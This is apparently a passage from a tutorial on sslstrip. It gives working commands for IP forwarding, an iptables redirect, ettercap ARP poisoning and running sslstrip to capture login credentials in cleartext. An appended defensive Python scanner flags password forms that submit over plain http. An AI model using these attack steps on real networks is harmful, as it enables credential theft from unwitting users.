However, we have an alternative: sslstrip. This tool effectively turns every connection your victim makes into a plaintext connection, robbing them of their SSL protection and sidestepping all certificate error concerns. It does this by handling the SSL connection with the server itself and replacing every instance of https with http in what the victim receives.
You can download the sslstrip Python script here.
You have to set up IP forwarding and a simple iptables PREROUTING rule before you begin:
root@zombi:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@zombi:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
The iptables rule simply states that all web traffic directed to your machine is redirected to port 10000, which is where sslstrip will be listening.
Fire up ettercap to ARP poison your victims. Here I just impersonate the gateway to the whole local network:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //
Then run sslstrip:
root@zombi:~/Downloads/sslstrip-0.7# python sslstrip.py -w dump
sslstrip 0.6 by Moxie Marlinspike running...
When your victim(s) visit what is supposed to be a secure page, they are actually interacting with it without any encryption at all, and they will receive no SSL certificate errors. Their only hope is to notice the missing signs, such as the "s" in https or the lock icon, or whatever other indicators their browser shows. All of the traffic that passes through sslstrip will be saved to the file you specified with the -w flag.
Here's our victim visiting a banking website:
And here's our victim logging into their gmail:
Sure enough, if we check the sslstrip log we see:
root@zombi:~/Downloads/sslstrip-0.7# cat dump
2010-03-30 11:41:28,231 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=-1464906762657940239&ltmpl=default&ltmpl=default&scc=1&GALX=PcWxJ-d1MHk&Email=fakefakefake&Passwd=justanexample&rmShown=1&signIn=Sign+in&asts=
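The stripped log entry above is the visible result of the rewrite described earlier: the login form's https action became http, so the Email and Passwd fields left the browser in cleartext. As an added, defender-side example (not part of this post or of sslstrip), the following Python scanner takes a captured response body and reports any form that would submit a password field over plain http, including forms whose relative action silently inherits the page's http scheme; all hostnames and page contents are constructed.

```python
"""Defensive check: find login forms that would submit a password over plain HTTP.

sslstrip rewrites every https:// link in a response to http://, so a login form
that should post to https://... posts to http://... and the credentials cross the
wire in cleartext. This scanner flags such forms in a captured response body.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Record each <form>'s resolved action and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or relative action inherits the page's own (http) scheme.
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "has_password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def plaintext_credential_forms(page_url, html):
    """Return action URLs of forms that carry a password field over plain http."""
    scanner = _FormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return [f["action"] for f in scanner.forms
            if f["has_password"] and urlsplit(f["action"]).scheme == "http"]


# Constructed sample: one login page intact, after an sslstrip-style rewrite, and
# with a relative action that resolves to the plain-http page it lives on.
PAGE_URL = "http://mail.example.test/"
INTACT_PAGE = ('<form action="https://accounts.example.test/login" method="post">'
               '<input name="Email"><input type="password" name="Passwd"></form>')
STRIPPED_PAGE = INTACT_PAGE.replace("https://", "http://")
RELATIVE_PAGE = '<form action="/login"><input type="PASSWORD" name="pw"></form>'
```

A proxy or browser extension can run this over every http response; an empty list for the intact page and a hit for the stripped one is the distinction the victim's browser does not make on its own.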